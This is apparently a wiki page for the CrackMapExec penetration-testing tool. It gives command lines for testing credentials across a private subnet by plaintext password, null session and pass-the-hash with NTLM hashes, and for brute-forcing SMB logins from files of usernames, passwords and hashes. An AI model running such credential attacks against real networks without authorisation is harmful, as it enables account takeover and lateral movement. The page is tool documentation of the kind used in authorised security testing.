This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 1.6k
Using Credentials
byt3bl33d3r edited this page Jun 5, 2016
·
27 revisions
The most basic way to test a set of of credentials across a network:
With a plaintext password:
crackmapexec 172.16.0.1/24 -u username -p password
Note: When using usernames or passwords that contain special symbols, wrap them in single quotes to make your shell interpret it as a string:
crackmapexec 172.16.0.1/24 -u username -p 'Admin!123@'
#Passing-the-Hash
CME supports authenticating using Passing-The-Hash attacks with the -H flag:
crackmapexec 172.16.0.1/24 -u username -H LMHASH:NTHASH
crackmapexec 172.16.0.1/24 -u username -H NTHASH
You can log in with a null session by using '' as the username and/or password
Examples:
crackmapexec 172.16.0.1/24 -u '' -p ''
By specifying a file or multiple values with the -u, -p and -H arguments, CME will automatically brute-force SMB logins for all targets:
Examples:
crackmapexec 172.16.0.1/24 -u username1 -p password1 password2
crackmapexec 172.16.0.1/24 -u username1 username2 -p password1
crackmapexec 172.16.0.1/24 -u username1 username2 -H LMHASH:NTHASH LMHASH:NTHASH
crackmapexec 172.16.0.1/24 -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec 172.16.0.1/24 -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes